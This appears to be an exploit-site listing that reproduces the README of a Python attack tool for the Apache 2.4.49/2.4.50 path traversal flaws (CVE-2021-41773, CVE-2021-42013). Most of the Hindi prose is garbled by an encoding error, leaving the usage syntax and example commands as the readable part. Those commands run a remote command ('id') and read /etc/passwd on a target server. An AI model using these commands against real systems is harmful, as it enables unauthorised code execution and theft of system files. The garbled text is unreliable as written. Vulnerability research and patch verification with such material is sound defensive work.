Sploitus

Exploit for CVE-2021-41773 CVE-2021-41773 CVE-2021-42013

kitploit ┬╖ 2026-08-25

Exploit Code

MARKDOWN48 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-R0OTK3R-CVE-2021-41773
# Apache рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рдФрд░ RCE рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ

**CVE-2021-41773 рдФрд░ CVE-2021-42013**

рдпреЗ рдЧрдВрднреАрд░ рдкрд╛рде рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рднреЗрджреНрдпрддрд╛рдПрдБ рд╣реИрдВ рдЬреЛ **Apache HTTP Server 2.4.49** рдФрд░ **2.4.50** рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рддреА рд╣реИрдВред  
рдпреЗ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдирд┐рдореНрди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИрдВ:

  * рд╡реЗрдм рд░реВрдЯ рдХреЗ рдмрд╛рд╣рд░ рдХреА рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ (LFI)
  * Remote Code Execution (RCE) рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рдпрджрд┐ CGI рд╕рдХреНрд╖рдо рд╣реИ



рджреЛрдиреЛрдВ рднреЗрджреНрдпрддрд╛рдПрдБ **Apache 2.4.51 рдореЗрдВ рдкреИрдЪ рдХреА рдЧрдИ рд╣реИрдВ** ред  
**рддрддреНрдХрд╛рд▓ рдЕрдкрдЧреНрд░реЗрдб рдХрд░рдиреЗ рдХреА рджреГрдврд╝рддрд╛ рд╕реЗ рдЕрдиреБрд╢рдВрд╕рд╛ рдХреА рдЬрд╛рддреА рд╣реИред**

* * *

## рдЙрдкрдпреЛрдЧ

root@kitploit:~
    
    
    python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
    

рдЙрджрд╛рд╣рд░рдг

  * Remote Code Execution:



root@kitploit:~
    
    
    python3 exploit.py --url http://192.168.1.10 --rce --command "id"
    

![RCE](https://assets.kitploit.com/production/public/readmes/31057/94ab3f54ab8f26cbfe6210b36deb95c8a8b37cfa65c464c7577f9ba11bad61b2.png)

  * Local File Inclusion:



root@kitploit:~
    
    
    python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"